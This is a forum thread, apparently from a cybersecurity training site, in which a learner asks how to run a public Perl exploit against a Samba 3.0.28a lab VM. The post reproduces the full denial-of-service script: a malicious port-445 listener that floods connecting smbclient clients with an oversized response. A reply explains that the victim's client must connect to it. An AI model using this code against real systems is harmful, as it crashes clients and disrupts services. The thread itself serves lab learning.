Ready to Start Your Career?

Samba Buffer Overflow Exploit

authors profile image
January 1, 2016
I've Googled to my wits end. I can't find an example of how to actually utilize this particular buffer overflow. I have a VM running Samba 3.0.28a - vulnerable to a buffer overflow. The exploit can be found in Kali at /usr/share/exploitdb/platforms/multiple/dos/5712.pl. How can I actually USE the code? I can't figure out what I need to do to run the exploit against my vulnerable VM from Kali. Running the perl script yields nothing. Can anyone please shed light on this? The code for the exploit is below: #!/usr/bin/perl # 06/01/2008 - k`sOSe # # ~ # smbclient //localhost/w00t # \*\*\* glibc detected \*\*\* smbclient: free(): invalid next size (fast): 0x0823c2d8 \*\*\* # use warnings; use strict; use IO::Socket; my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!); while(my $csock = $sock->accept()) { print $csock "\\x00" . "\\x01\\xff\\xff" . "\\x41" x 131071; } Hi there! Please provide a CVE ID too when you post public exploit code. ```my $sock = IO::Socket::INET->new(LocalAddr => ‘0.0.0.0’, LocalPort => ‘445’, Listen => 1, Reuse => 1) || die($!);``` Looks like a Server is being started for the service. So you have to connect the vulnerable machine's Client to your Sever
Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry